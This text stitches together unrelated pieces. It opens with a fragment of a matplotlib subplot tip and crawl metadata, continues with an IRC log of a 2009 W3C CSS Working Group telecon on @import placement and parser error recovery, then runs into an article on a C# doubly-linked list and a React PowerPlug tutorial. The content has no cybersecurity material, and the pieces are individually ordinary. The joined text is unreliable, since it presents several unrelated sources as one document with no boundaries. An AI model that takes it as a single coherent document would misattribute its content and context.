fig.delaxes(axes[4, 2]) fig.delaxes(axes[4, 3]) fig.delaxes(axes[4, 4]) fig.delaxes(axes[4, 5]) But this can be tedious and makes for bloated, repetitive code. Instead, consider the following trick that uses: - The enumerate()function to figure out where the iteration left off - The elsestatement after a forloop to delete each subplot in the rest of the figure fig, axes = plt.subplots(5, 6, figsize=(16, 8)) for idx, (col, ax) in enumerate(zip(df.columns, axes.flatten())): ax.bar(df.index, df[col]) ax.set_title(col) plt.subplots_adjust(wspace=.5, hspace=.5) else: [ax.set_visible(False) for ax in axes.flatten()[idx+1:]]
https://napsterinblue.github.io/notes/python/viz/subplots/
CC-MAIN-2021-04
refinedweb
594
58.99
03 August 2006 12:14 [Source: ICIS news] ?xml:namespace> Small enterprises will need to place deposits of at least CNY300,000 while deposits for medium-sized firms are set at a minimum of CNY1m, the State Administration of Work Safety said in a statement on its Web site. Large-scale companies will need to pay at least CNY1.5m while super large-scale firms will have to pay at least CNY3m, it added, but it did not say how companies will be categorised. The deposits should not be more than CNY5m, it said. The new regulation takes effect on 1 August. Companies will have to pay money to take care of the aftermath in accidents and the deposits will be used cover any shortfalls,.
http://www.icis.com/Articles/2006/08/03/1082604/china+asks+harzardous+chem+producers+for+deposit.html
CC-MAIN-2013-20
refinedweb
125
79.7
IRC log of css on 2009-02-25 Timestamps are in UTC. 16:53:30 [RRSAgent] RRSAgent has joined #css 16:53:30 [RRSAgent] logging to 16:53:39 [plinss] zakim, this will be style 16:53:40 [Zakim] ok, plinss; I see Style_CSS FP()12:00PM scheduled to start in 7 minutes 16:55:41 [Zakim] Style_CSS FP()12:00PM has now started 16:55:43 [Zakim] + +1.253.307.aaaa 16:56:40 [Zakim] - +1.253.307.aaaa 16:56:41 [Zakim] Style_CSS FP()12:00PM has ended 16:56:41 [Zakim] Attendees were +1.253.307.aaaa 16:57:43 [Zakim] Style_CSS FP()12:00PM has now started 16:57:45 [Zakim] + +1.858.354.aaaa 16:57:56 [plinss] zakim, +1.858.354 is me 16:57:57 [Zakim] +plinss; got it 16:58:07 [Zakim] +dsinger 16:58:08 [Zakim] -dsinger 16:58:09 [Zakim] +dsinger 16:58:14 [Zakim] + +1.253.307.aabb 16:58:27 [dsinger] dsinger has joined #css 16:58:46 [plinss] zakim, +1.253.307 is arronei 16:58:46 [Zakim] +arronei; got it 16:58:47 [dsinger] Zakim, mute me 16:58:48 [Zakim] dsinger should now be muted 16:58:58 [Zakim] +[Microsoft] 16:59:12 [dsinger] Good morning ... On bus as usual 16:59:24 [plinss] morning David 17:01:52 [plinss] zakim, [microsoft] has sylvaing 17:01:52 [Zakim] +sylvaing; got it 17:02:05 [dsinger] Zakim, who is here? 17:02:05 [Zakim] On the phone I see plinss, dsinger (muted), arronei, [Microsoft] 17:02:07 [Zakim] [Microsoft] has sylvaing 17:02:11 [Zakim] On IRC I see dsinger, RRSAgent, Zakim, arronei, fantasai, plinss_, shepazu, jdaggett, plinss, Bert, krijnh, trackbot, Hixie 17:02:45 [dsinger] Ah, do we have a chair? 17:02:51 [plinss] yes 17:03:20 [dsinger] Cool 17:03:28 [ChrisL] ChrisL has joined #css 17:03:50 [dbaron] dbaron has joined #css 17:04:27 [dsinger] I will have to stop at 9:55 btw 17:04:30 [Zakim] +ChrisL 17:04:55 [sylvaing] sylvaing has joined #css 17:05:16 [Zakim] +Bert 17:05:26 [Zakim] +David_Baron 17:06:17 [Zakim] +??P10 17:07:25 [dsinger] P10 must be fantasai? 17:07:49 [ChrisL] zakim, ??p10 is probably fantasai 17:07:49 [Zakim] +fantasai?; got it 17:08:48 [ChrisL] scribe: chris 17:08:49 [Zakim] +howcome 17:08:53 [ChrisL] scribenick: chrisl 17:09:05 [ChrisL] rrsagent, here 17:09:05 [RRSAgent] See 17:09:19 [ChrisL] rrsagent, make logs public 17:09:26 [ChrisL] topic: @import 17:09:31 [plinss] 17:10:36 [ChrisL] cl: sent some email about multiple @rules clamouring to be 'first' 17:10:41 [ChrisL] zakim, who is speaking? 17:10:52 [Zakim] ChrisL, listening for 10 seconds I heard sound from the following: [Microsoft] (64%), ChrisL (63%), Bert (4%), howcome (5%) 17:11:20 [sylvaing] Zakim, [Microsoft] has sylvaing 17:11:20 [Zakim] sylvaing was already listed in [Microsoft], sylvaing 17:12:02 [ChrisL] sg: need to distinguish functionaly valid from syntactically valid 17:12:20 [ChrisL] hl: we should use the canonoical CSS syntax 17:12:35 [ChrisL] pl: agree with chris point but its not related to the current issue 17:12:53 [ChrisL] ... so the current case seems like a problem 17:12:54 [Zakim] +Melinda_Grant 17:13:20 [ChrisL] hl; problematic, use the eternal syntax not the css 1, 2 or 3 syntax 17:13:50 [ChrisL] db: so implementations that dont implement that currently will need to do so, to see if some junk fits the eternal synbtax 17:13:58 [melinda] melinda has joined #CSS 17:14:23 [ChrisL] ee: we don't wat to cut off extensibility 17:14:44 [ChrisL] sl: the specific test case in anne's emailis gramatically correct, but implementations differ 17:15:23 [ChrisL] ae: in fact it is invalid due to leading numeric 17:16:14 [ChrisL] pl: would not allow a valid rule, but would allow known or unknown @rules. 17:16:19 [ChrisL] hl: yes 17:16:28 [ChrisL] cl: i agree 17:16:52 [alexmog] alexmog has joined #css 17:16:52 [ChrisL] so in the anne test case, its not an @rule. 17:17:23 [ChrisL] sl: spec talks about valid statements, not @rules specifically. but this is not a valid statement 17:17:39 [ChrisL] hl: bert? 17:18:00 [ChrisL] bb: don't want it to load, as the rule ight be valid in the future. need to stop it loading 17:18:12 [ChrisL] sl: butbrowsers do load these currently 17:18:17 [ChrisL] hl: they should not 17:18:41 [ChrisL] bb: some day we may invent an @rule that has to come before an @import 17:19:09 [ChrisL] cl: @charset isn't an @rule 17:19:17 [ChrisL] bb: no, its special cased in the grammar 17:19:19 [Zakim] -arronei 17:19:39 [ChrisL] ae: yes but its reparsed as an @rule once the charset is detected 17:19:45 [ChrisL] bb: no 17:20:30 [ChrisL] sl: spec says @import cannot come after a valid statement. but this is not a valid sytatement. 17:20:44 [ChrisL] bb: its correct 17:20:55 [ChrisL] bb: its a normal token, 17:21:15 [ChrisL] sl: which meaning of valid do we mean here. succesfully parsed, or known and can be applied? 17:21:19 [ChrisL] pl: the former 17:22:03 [ChrisL] hl: we cn say there should be nothing ahead of @import except @charset. removes need to discuss 'valid' 17:22:28 [ChrisL] db: has anyone looked at whatwebkit does? do not want to get into non-interoperable behaviour 17:22:47 [ChrisL] .. what exactly does webkit to to accept or reject this @rule? 17:23:21 [ChrisL] hl: if we can agree on a simple workable solution we can test it against implementations 17:23:29 [fantasai] db: The solution we use in Gecko is, if it parses into something that we know about, then we drop following @import rules 17:23:47 [ChrisL] db: in gecko, if the rule is dropped then we continue to process the @rule 17:23:59 [ChrisL] hl; easy to flag if something has been dropped 17:24:23 [ChrisL] db: an extra semicolon at end of time - would that cause the @import to be dropped? 17:24:26 [ChrisL] hl: no 17:24:28 [dsinger] dsinger has joined #css 17:24:40 [Zakim] +[Apple] 17:24:50 [Zakim] -dsinger 17:24:56 [dsinger] zakim, [apple] has dsinger 17:24:56 [Zakim] +dsinger; got it 17:25:03 [ChrisL] ee: do you drop @import after an invalid selector? eg two commas 17:25:11 [fantasai] or an unknown pseudo 17:25:17 [ChrisL] db: yes so following @import would be allowed 17:25:34 [ChrisL] bb: suggest we allow empty stements, space, cdo cdc, nothing else 17:25:40 [fantasai] s/allowed/loaded/ 17:25:51 [ChrisL] s/stements/statements/ 17:26:13 [ChrisL] plh: its reasonable but not forward compatible 17:26:51 [ChrisL] db: properties not an issue as they are inside the rules, . error in selctor forces rule to be dropped 17:26:58 [Lachy] Lachy has joined #css 17:27:06 [ChrisL] bb; concerned about things that could be valid in the future 17:27:44 [ChrisL] db: spec id clear on rules being ignored. if spec must be ignored it can't trigger other things 17:27:57 [ChrisL] cl: so ignored means treat as if it was never there 17:28:27 [ChrisL] db: we have that issue witha lot of things. dont want future stylesheets to break completely 17:28:53 [ChrisL] pl: issue is that if the rule becomes valid tomorrow, it stops the @import loading 17:29:37 [ChrisL] sl: this can happen today, ie8 does not support :: for example so following import will load but later, or in other browsers, it will be skipped 17:30:52 [ChrisL] cl: how much existing content would break if the spec said nothing before @import? 17:31:00 [ChrisL] hl: little to none 17:31:12 [ChrisL] pl: would require changes in implementations though 17:31:45 [ChrisL] ee: any @rules that are dropped should be allowed before @import 17:32:20 [ChrisL] db: media queries changed syntax f @import. its not valid css2. so does non-media-queries implementsation drop? 17:32:41 [szilles] szilles has joined #css 17:32:52 [dbaron] example was, given two rules: @import url(foo) (min-width:800px); @import url(bar); 17:32:53 [ChrisL] pl: there are implementations that do not support media queries 17:33:03 [dbaron] implementations without media queries skip the first; with this change would we also require them to skip the second? 17:33:20 [fantasai] I strongly believe that we should allow dropped @rules before @import 17:33:35 [ChrisL] ee: we should allow any (currently invalid) @rule before @import 17:33:44 [ChrisL] sl: invalid or unknown? 17:33:48 [ChrisL] cl: unknown 17:33:54 [ChrisL] hl: can live with 17:34:31 [ChrisL] ee: and also as bert said, empty statements and cdo cdc 17:35:05 [ChrisL] pl; odd that current @rules would block @import 17:35:17 [ChrisL] db: thats ok and we want it for forward compat 17:35:43 [ChrisL] ee: adding @rule before @import is pretty rare. less of an issue than withselectors 17:36:14 [dbaron] so if you only allow unknown @-rules and don't allow anything that's not an @-rule, don't you end up distinguishing between: 17:36:20 [dbaron] @new-rule {} 17:36:23 [ChrisL] pl: issue is known @rules not supported by older browsers 17:36:24 [dbaron] @new-rule {}; /* extra semicolon at end */ 17:36:55 [ChrisL] pl: covered by emptystatement rule 17:37:12 [ChrisL] db; we have a concept of empty statement? 17:37:22 [ChrisL] bb: would need to be defined in spec, but its clear 17:37:30 [ChrisL] pl; i detect consensus 17:39:20 [plinss] the current proposal is: disallow any statements before @import except: empty statements, comment tokens, and unknown, but wel-formed @rules 17:39:46 [ChrisL] ee: unknown or invalid 17:39:54 [fantasai] @foo; 17:39:57 [ChrisL] sl: it says unknown but wel formed 17:39:59 [fantasai] @import; 17:40:14 [fantasai] @namespace *; 17:40:30 [ChrisL] bb: grammar does not seem to allow empty statements 17:40:40 [ChrisL] ee: anything that has been ignored 17:40:54 [dbaron] yeah, maybe the extra-semicolon thing causes the next selector/rule to be ignored at present 17:41:10 [fantasai] that starts with an @sign 17:41:14 [ChrisL] s/anything/anything starting @/ 17:41:17 [fantasai] @1; 17:41:21 [fantasai] @import "style.css"; 17:41:45 [ChrisL] ee: @1; does not parse as an at-rule 17:41:57 [ChrisL] bb; neither a selector nor an @rule 17:42:14 [ChrisL] sl; has to parse as an @rule first, then the rule is applied 17:42:34 [ChrisL] pl: so @1; would block @import 17:42:36 [ChrisL] cl: yes 17:43:22 [ChrisL] (no objection heard) 17:43:25 [dbaron] I think it would be good to see the proposal actually written up. 17:43:45 [dbaron] This is rather hard to follow with lots of abstract statements. 17:43:57 [fantasai] I agree 17:44:07 [ChrisL] dbaron - yes, but if we resolve it then someone can get an action to write it up in detail 17:44:34 [ChrisL] bb: (error recovery - scribe missed) 17:44:34 [dbaron] I think we should action somebody to write it up without resolving. 17:45:06 [ChrisL] trackbot, status 17:45:49 [ChrisL] action; sylvian to write up the proposal on @import and unknown well formed @rules 17:45:58 [ChrisL] action: sylvian to write up the proposal on @import and unknown well formed @rules 17:45:58 [trackbot] Sorry, couldn't find user - sylvian 17:46:00 [Bert] (Issue 24 is about recovering from invalid tokens when inside a selector. The ; in @1; is such an invalid token. What to do? Skip to the next {}?) 17:46:03 [fantasai] Sylvain 17:46:15 [ChrisL] action: sylvain to write up the proposal on @import and unknown well formed @rules 17:46:16 [trackbot] Created ACTION-123 - Write up the proposal on @import and unknown well formed @rules [on Sylvain Galineau - due 2009-03-04]. 17:46:38 [fantasai] 17:46:40 [fantasai] 17:46:55 [ChrisL] topic: issue-24 17:46:57 [plinss] 17:46:59 [ChrisL] issue-24? 17:46:59 [trackbot] ISSUE-24 -- Does the 'background' shorthand needs both clip and origin? -- CLOSED 17:46:59 [trackbot] 17:47:19 [ChrisL] pl: not that one 17:47:41 [ChrisL] oops,css2.1 issue not tracker issue. ifnore above 17:48:05 [fantasai] 17:48:46 [ChrisL] ee: we wanted to requie matching brackets, the change we made to fix this solves selectors but adds a new problem for 17:48:56 [ChrisL] ... declarations 17:49:32 [ChrisL] ... makes the trap point for an invalid declaration to be astatement not a declaration 17:50:02 [ChrisL] ... so a rue with an invalid statement will be completely ignored instead of justthat statement 17:50:04 [fantasai] 17:50:53 [ChrisL] ee: so we need to go back and replace with 'statement ordeclaration'. or duplicate the rule, one for malformed statement and one for malformed declarations 17:51:23 [ChrisL] bb: statement or declaration is probably correct. problem is the section is called malformed declarations 17:51:29 [ChrisL] ee: change all occurences 17:51:41 [ChrisL] bb: would work 17:52:08 [ChrisL] bb: so if you are in a declaration, skip to end of declaration 17:52:15 [ChrisL] bb: yes, think its correct 17:52:52 [ChrisL] cl: so there are two proposals 17:53:30 [ChrisL] ee: scope of changes is only one paragraph 17:54:14 [ChrisL] bb; edge case, when inside a selector, if the token in error is at or before the start of the selector. what are you 'in' 17:54:19 [ChrisL] ee: a statement 17:54:25 [ChrisL] bb: what kind? 17:54:36 [ChrisL] ee: you don;t know at that point 17:54:48 [ChrisL] bb: so ignore that singe token? 17:55:03 [ChrisL] ee: treat it as a selector, dont ignore that token. 17:55:19 [ChrisL] bb: talking of tokens thatare disallowed by the grammar 17:55:35 [ChrisL] bb: colon is allowed, better example .... 17:55:47 [ChrisL] ... closing brace for example 17:56:04 [ChrisL] ee: if its not an @rule, treat as aselector 17:56:19 [ChrisL] bb: fine with me. deals with future expansion 17:56:53 [ChrisL] pl: other opinions? 17:57:16 [ChrisL] bb: hard to follow without examples 17:57:21 [Zakim] -[Apple] 17:57:40 [dsinger] bye...another meeting, sorry 17:57:48 [ChrisL] pl: can we resolve here or do we need more discussion? 17:58:40 [dbaron] (Confusion about what we would be resolving on.) 17:59:38 [ChrisL] action: bert to propose specific wording on complete text for what is inserted and deleted for bracket/quote parsing 17:59:39 [trackbot] Created ACTION-124 - Propose specific wording on complete text for what is inserted and deleted for bracket/quote parsing [on Bert Bos - due 2009-03-04]. 17:59:49 [ChrisL] ee: is it solved with two separate rules? 17:59:53 [ChrisL] bb: not sure 18:00:25 [ChrisL] pl: why dont you two work together onthat action so it can be closed quickly 18:00:35 [ChrisL] zakim, list attendees 18:00:36 [Zakim] As of this point the attendees have been +1.858.354.aaaa, plinss, dsinger, +1.253.307.aabb, arronei, sylvaing, ChrisL, Bert, David_Baron, fantasai?, howcome, Melinda_Grant 18:00:40 [ChrisL] chair: Peter 18:00:57 [ChrisL] rrsagent, make minutes 18:00:57 [RRSAgent] I have made the request to generate ChrisL 18:02:18 [Zakim] -howcome 18:02:23 [Zakim] -[Microsoft] 18:02:24 [Zakim] -Melinda_Grant 18:02:24 [Zakim] -ChrisL 18:02:26 [Zakim] -plinss 18:02:27 [Zakim] -David_Baron 18:02:29 [Zakim] -Bert 18:02:33 [Zakim] -fantasai? 18:02:35 [Zakim] Style_CSS FP()12:00PM has ended 18:02:36 [Zakim] Attendees were +1.858.354.aaaa, plinss, dsinger, +1.253.307.aabb, arronei, sylvaing, ChrisL, Bert, David_Baron, fantasai?, howcome, Melinda_Grant 18:02:45 [ChrisL] Meeting: CSS telcon 18:02:49 [ChrisL] rrsagent, make minutes 18:02:49 [RRSAgent] I have made the request to generate ChrisL 18:03:00 [dbaron] I assume no telecon next week since it'll be 2-3am between the first and second day of the f2f meeting 18:03:07 [ChrisL] zakim, where is 858? 18:03:07 [Zakim] North American dialing code 1.858 is California 18:03:20 [ChrisL] zakim, where is 253? 18:03:20 [Zakim] North American dialing code 1.253 is Washington 18:03:43 [arronei] 253 was arronei 18:03:43 [dbaron] 858 is San Diego 18:03:43 [ChrisL] dbaron, that seems a safe assumption 18:03:48 [plinss] chris: 858 was me 18:03:56 [dbaron] 18:04:19 [ChrisL] ok, they are both listed explicitly in the attendance list already 18:04:47 [ChrisL] Present: plinss, dsinger, arronei, sylvaing, ChrisL, Bert, David_Baron, fantasai, howcome, Melinda_Grant 18:04:53 [ChrisL] rrsagent, make minutes 18:04:53 [RRSAgent] I have made the request to generate ChrisL 18:15:55 [ChrisL] regrets: szilles, daniel, emily, molly, anne 18:15:57 [ChrisL] rrsagent, make minutes 18:15:57 [RRSAgent] I have made the request to generate ChrisL 18:16:55 [ChrisL] s/ifnore/ignore/ 18:17:09 [ChrisL] s/bb;/bb:/g 18:17:36 [ChrisL] s/sl;/sl:/g 18:17:53 [ChrisL] s/pl;/pl:/g 18:18:07 [ChrisL] s/db;/db:/g 18:18:25 [ChrisL] s/hl;/hl:/g 18:18:41 [ChrisL] rrsagent, make minutes 18:18:41 [RRSAgent] I have made the request to generate ChrisL 18:20:55 [sylvaing] sylvaing has joined #css 18:33:33 [sylvaing] sylvaing has joined #css 20:00:56 [melinda] melinda has joined #CSS 20:02:26 [dbaron] dbaron has joined #css 20:28:56 [Zakim] Zakim has left #css 20:37:38 [sylvaing] sylvaing has joined #css 23:06:05 [sylvaing] sylvaing has joined #css 23:49:28 [sylvaing] sylvaing has joined #css
http://www.w3.org/2009/02/25-css-irc
CC-MAIN-2018-05
refinedweb
3,103
59.16
I was writing some code in C# the other day and I realized I needed a linked list to make something I was doing easier. I wanted a list that would collapse around a removed object, and that was not be backed by an array. I naturally went to the .NET Framework and the System.Collections namespace to look at the .NET linked list that I just assumed would be there. To my surprise there was not one. I could not believe it. I then searched MSDN looking for one to see if it was placed in another namespace. It was not; it just did not exist in the .NET Framework. Finally, I searched the internet and still could not find one implemented in C#. System.Collections That inspired me to write my own linked list. Not just a standard linked list, but a doubly-linked list. A list where each element has a reference to the next element and the previous element. A standard linked list would just have a reference to the next element. With doubly-linked list, the list can easily be traversed forward and backwards and delete an element in constant time. My doubly-linked list, which we will call just LinkedList from now on, starts by implementing the following interfaces. LinkedList IList ICollection IEnumerable ICloneable Then under this public facade we have a lot of very important private members that do the bulk of the work. class Node class LinkedListEnumerator FindNodeAt(int) Remove(Node) Node headerNode int modifications The Node class is a very simple class, yet it is a very key part of the LinkedList. It wraps an object and keeps a reference to the next node and the previous node. The Node class is hidden from the user of the LinkedList, so that it works like any other collection in the .NET Framework. Node The headerNode member variable of type Node has an important role as the starting point in the list. This Node contains a null reference and can never be accessed by the user or removed. It is not considered in the count of total objects in the list. This Node is important in a doubly-linked list, as it is technically the beginning and ending of the list. headerNode null The FindNodeAt(int index) method contains the search algorithm for accessing the list by index. At the moment it divides the list in half and searches from the beginning or the end depending on which is closest to the requested index. This method is used by all the other methods directly or indirectly that require access to an object by index. This helps to make the searches much faster. There is potential for improvement for large lists by further dividing before searching, however, at a cost for small lists. Right now this seems like the best compromise for most usages. The current algorithm used to find a Node is below. FindNodeAt(int index) index object Node node = headerNode; if (index < (count / 2)) { for (int i = 0; i <= index; i++) node = node.NextNode; } else { for (int i = count; i > index; i--) node = node.PreviousNode; } The Remove(Node value) is important because it adjusts the remaining Nodes by compressing the list. This is done simply by taking the Node that needs to be removed and changing its previous Node's next Node reference to its next Node, and changing its next Node's previous Node reference to its previous Node then leaving itself for the garbage collector. This may be easier to understand by viewing the algorithm used in this method below. Remove(Node value) if (value != headerNode) { value.PreviousNode.NextNode = value.NextNode; value.NextNode.PreviousNode = value.PreviousNode; count--; modifications++; } The modifications member variable of type int is incremented every time there is a modification to the structure of the list. The variable is then used by the LinkedListEnumerator to guard against concurrent modifications to the list while enumerating. modifications int LinkedListEnumerator The LinkedList class is not thread safe by design. If thread safety is required, the class can be extended to provide it. The LinkedListEnumerator class is fail-fast. This means it uses the modifications variable it is passed when it is created to know if any modifications have been made while enumerating. The check is made in its MoveNext() method before it increments to the next value. If a modification has been detected then it will throw a SystemException that can then be caught and handled accordingly. Below is the source for LinkedListEnumerator class. MoveNext() SystemException private class LinkedListEnumerator : IEnumerator { private LinkedList linkedList; private int validModificationCount; private Node currentNode; public LinkedListEnumerator(LinkedList linkedList) { this.linkedList = linkedList; validModificationCount = linkedList.modifications; currentNode = linkedList.headerNode; } public object Current { get { return currentNode.CurrentNode; } } public void Reset() { currentNode = linkedList.headerNode; } public bool MoveNext() { bool moveSuccessful = false; if (validModificationCount != linkedList.modifications) throw new SystemException( "A concurrent modification occured to the LinkedList " + "while accessing it through it's enumerator."); currentNode = currentNode.NextNode; if (currentNode != linkedList.headerNode) moveSuccessful = true; return moveSuccessful; } } The LinkedList(ICollection) constructor and the AddAll(ICollection) and InsertAll(int, ICollection) are there for convenience to the user of the list. This constructor calls AddAll(ICollection) which in turn calls InsertAll(int, ICollection). Below is the the code for this method. LinkedList(ICollection) AddAll(ICollection) InsertAll(int, ICollection) public virtual void InsertAll(int index, ICollection collection) { if (collection != null) { if (0 < collection.Count) { modifications++; Node startingNode = (index == count ? headerNode : FindNodeAt(index)); Node previousNode = startingNode.PreviousNode; foreach (object obj in collection) { Node node = new Node(obj, startingNode, previousNode); previousNode.NextNode = node; previousNode = node; } startingNode.PreviousNode = previousNode; count += collection.Count; } else throw new ArgumentOutOfRangeException("index", index, "less than zero"); } else throw new ArgumentNullException("collection"); } The LinkedList provides two methods for cloning. The first is the ICloneable interface Clone() method. It provides a shallow copy of the LinkedList. The second is Clone(bool attemptDeepCopy). It attempts to make a deep copy of the list if passed true, if false it will make a shallow copy. If an object in the list is not an ICloneable then it will throw a SystemException. The returned attempted deep copied list is not guaranteed to be a true deep copy. It defers the cloning to the objects own Clone() method. Here is the source for these two methods. Clone() Clone(bool attemptDeepCopy) true false public virtual object Clone() { LinkedList listClone = new LinkedList(); for (Node node = headerNode.NextNode; node != headerNode; node = node.NextNode) listClone.Add(node.CurrentNode); return listClone; } public virtual LinkedList Clone(bool attemptDeepCopy) { LinkedList listClone; if (attemptDeepCopy) { listClone = new LinkedList(); object currentObject; for (Node node = headerNode.NextNode; node != headerNode; node = node.NextNode) { currentObject = node.CurrentNode; if (currentObject == null) listClone.Add(null); else if (currentObject is ICloneable) listClone.Add(((ICloneable)currentObject).Clone()); else throw new SystemException("The object of type [" + currentObject.GetType() + "] in the list is not an ICloneable, cannot attempt " + "a deep copy."); } } else listClone = (LinkedList)this.Clone(); return listClone; } I believe this is a great class to learn how to implement your own custom collection. It is also very useful as it is, and ready to be included in your next project. The rest of the class is fairly straight-forward for a list collection. The class is fairly well commented using XML comment tags. Experienced and intermediate developers should have no trouble following the class. This LinkedList is part of a set of .NET utilities I am developing, and have released as an open source project under the GNU General Public License (GPL). My complete project can be found at Source Forge. This article has no explicit license attached to it but may contain usage terms in the article text or the download files themselves. If in doubt please contact the author via the discussion board below. A list of licenses authors might use can be found here Coding is a way of life.It's in the air we breath.It pumps through our vines.Without it we soon crumble to dust. - Rodney S. Foley Coding is a way of life.It's in the air we breath.It pumps through our veines.Without it we soon crumble to dust. - Rodney S. Foley General News Suggestion Question Bug Answer Joke Rant Admin Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages.
http://www.codeproject.com/Articles/2836/Doubly-Linked-List-Implementation?msg=1672007
CC-MAIN-2014-41
refinedweb
1,383
58.69
csOBBFrozen Class ReferenceVersion of the csOBB with frozen corners (for optimization purposes). More... [Geometry utilities] #include <csgeom/obb.h> Detailed DescriptionVersion of the csOBB with frozen corners (for optimization purposes). Definition at line 117 of file obb.h. Constructor & Destructor Documentation Create an empty csOBBFrozen which is not initialized. Definition at line 142 of file obb.h. Member Function Documentation Copy a normal OBB and freeze the corners. Copy a normal OBB and freeze the corners. Definition at line 126 of file obb.h. References csOBB::GetCorner(). Project this OBB to a 2D screen space box. Returns false if OBB is not on screen. The documentation for this class was generated from the following file: Generated for Crystal Space 1.2.1 by doxygen 1.5.3
http://www.crystalspace3d.org/docs/online/api-1.2/classcsOBBFrozen.html
CC-MAIN-2015-32
refinedweb
127
53.88
If you’re trying to rapid prototype an app the last thing you want to be doing is implementing the same state management logic over and over. Adding something like Redux can help but tends to just adds a layer of complexity that can slow you down every further. React PowerPlug makes rapid prototyping a breeze by introducing a set of stateful components that let you focus on the good stuff, actually prototyping! React PowerPlug is a set of renderless components that provide different types of state management scenarios by way of render props. The project is dependency-free, well documented and pretty small at around 3kb. A word of warning though, the project’s master branch is still considered unstable and under active development. I opted to talk about the unstable version because it has so much more to offer in terms of different types of stateful components. 🐊 Recommended courses ⤵️⚛️ Learn React and React Hooks using a project-based approach Getting Started To get things started, we will need to add React PowerPlug to our project: Via npm $ npm install --save react-powerplug Or via Yarn $ yarn add react-powerplug With the dependency added to our project, we will need to import React PowerPlug in it’s entirety: import ReactPowerPlug from "react-powerplug"; Or import the individual components we’d like to use: import { Counter, Hover, Togggle } from "react-powerplug"; Examples As mentioned, the master branch of this project has a ton of additional stateful components. While the type of data may be different between the components, nearly all of the components accept an initial property to set the default state. Managing State A component’s state can come in many different forms. It could be as simple as holding a single value or as complex as a mixed bag of boolean values, counters and string values. State State is one of the more basic components. Very similar to React’s baked in state property, State allows you to maintain an object of state properties that can updated via setState: <State initial={{ favorite: "", picked: "" }}> {({ state, setState }) => ( <div> <button onClick={() => setState({ favorite: "Alligator", picked: new Date().toLocaleTimeString() }) } > Alligator </button> <button onClick={() => setState({ favorite: "Crocodile", picked: new Date().toLocaleTimeString() }) } > Crocodile </button> <button onClick={() => setState({ favorite: "", picked: "" })}> Reset </button> {state.favorite && state.picked && ( <div> <br />You picked {state.favorite} at {state.picked} </div> )} </div> )} </State> Toggle Toggle is a component for maintaining the state of a boolean value: <Toggle initial={false}> {({ on, toggle }) => ( <div> <input type="checkbox" checked={on} onChange={toggle} /> <br /><br /> {on && <div>This box is CHECKED!</div>} {!on && <div>This box is NOT CHECKED!</div>} </div> )} </Toggle> Counter Counter allows you to increment and decrement an integer in the state: <Counter initial={0}> {({ count, inc, dec }) => ( <div> {count === 0 && <div>There are no little alligators</div>} {count === 1 && <div>There is 1 little lonely alligator</div>} {count > 1 && <div>There are {count} little alligators</div>} <div> <br /> <button onClick={dec}>-</button> <button onClick={inc}>+</button> </div> </div> )} </Counter> Value Value is for maintaining the state of a single value. Set it and forget it: <Value initial="#008F68"> {({ value, set }) => ( <div> <div style={{ height: 100, width: 100, background: value, margin: "0 auto" }} /> <div> <br /> <button onClick={() => set("#008F68")}>#008F68</button> <button onClick={() => set("#6DB65B")}>#6DB65B</button> <button onClick={() => set("#4AAE9B")}>#4AAE9B</button> </div> </div> )} </Value> Map The Map component is quite similar to State as it controls state as an object with different properties. Where it differs is that you interact with the state via get and set methods: <Map initial={{ reptile: "", picked: "" }}> {({ set, get }) => ( <div> <button onClick={() => { set("favorite", "Alligator"); set("picked", new Date().toLocaleTimeString()); }} > Alligator </button> <button onClick={() => { set("favorite", "Crocodile"); set("picked", new Date().toLocaleTimeString()); }} > Crocodile </button> <button onClick={() => { set("favorite", ""); set("picked", ""); }} > Reset </button> {get("favorite") && get("picked") && ( <div> <br />You picked {get("favorite")} at {get("picked")} </div> )} </div> )} </Map> Set Not to be confused with the aforementioned set method, the Set component manages it’s state as an array of values which you can add to and remove from: <Set initial={["Alligator", "Crocodile"]}> {({ values, add, remove }) => ( <div> {values.length === 0 && <div>Our set is empty!</div>} {values.length > 0 && ( <div> {values.map(value => ( <div> {value} <button onClick={() => remove(value)}>X</button> <br /><br /> </div> ))} </div> )} <input type="text" placeholder="Type here and hit enter" onKeyPress={event => { if (event.key === "Enter") { add(event.target.value); event.target.value = ""; } }} /> </div> )} </Set> List List also holds it’s state as an array. Instead of simple add and remove methods, you interact with the array via push and pull methods. Considering the complexity that is introduced by needing to know the index of the array item when pulling from the state, I’d probably just stick to Set: <List initial={["Alligator", "Crocodile"]}> {({ list, push, pull }) => ( <div> {list.length === 0 && <div>Our list is empty!</div>} {list.length > 0 && ( <div> {list.map(item => ( <div> {item} <button onClick={() => pull(i => item === i)}>X</button> <br /><br /> </div> ))} </div> )} <input type="text" placeholder="Type here and hit enter" onKeyPress={event => { if (event.key === "Enter") { push(event.target.value); event.target.value = ""; } }} /> </div> )} </List> Managing User Interactions Keeping track of a user’s interaction with a component usually includes binding event handlers on top of keeping track of the current state. React PowerPlug does a great job of not only combining these implementations but also keeping you fairly insulated from needing to worry about event handlers. Hover Hover keeps track of whether or not a user is hovering over a component: <Hover> {({ hovered, bind }) => ( <div {...bind}> {!hovered && <div>See you later, alligator!</div>} {hovered && <div>After 'while, crocodile!</div>} </div> )} </Hover> Active Active knows if a user is clicking on a component: <Active> {({ active, bind }) => ( <div {...bind}> {!active && <span>Click here to activate!</span>} {active && <span>STOP CLICKING ME!!</span>} </div> )} </Active> Touch Similar to Active, the Touch component is the touch-friendly equivalent: <Touch> {({ touched, bind }) => ( <div {...bind}> {!touched && <span>Touch here to trigger!</span>} {touched && <span>STOP TOUCHING ME!!</span>} </div> )} </Touch> Focus Focus is perfect for showing and hiding information based on which field a user is currently interacting with: <Focus> {({ focused, bind }) => ( <div> <input type="text" placeholder="Click to focus this input!" {...bind} /> <div> {focused ? "Great for showing help text ONLY when focused!" : ""} </div> </div> )} </Focus> Forms Even though React PowerPlug has components that could easily be used to wrap up form components, they still took the time to include some form-specific components to help save you time: Input Input, which works with input instead of replacing it, binds input events to an input or any form field and stashes the value in the state: <Input initial=""> {({ bind, value }) => ( <div> <input type="text" {...bind} /> <div> {value.length ? `You typed: ${value}` : "You have not typed anything :("} </div> </div> )} </Input> Form The Form component takes things a step further by allowing you to track the state of multiple fields on a form with ease: <Form initial={{ firstName: "", lastName: "" }}> {({ input, values }) => ( <form onSubmit={e => { e.preventDefault(); console.log("Form Submission Data:", values); }} > <input type="text" placeholder="Your First Name" {...input("firstName").bind} /> <input type="text" placeholder="Your Last Name" {...input("lastName").bind} /> <input type="submit" value="All Done!" /> </form> )} </Form> 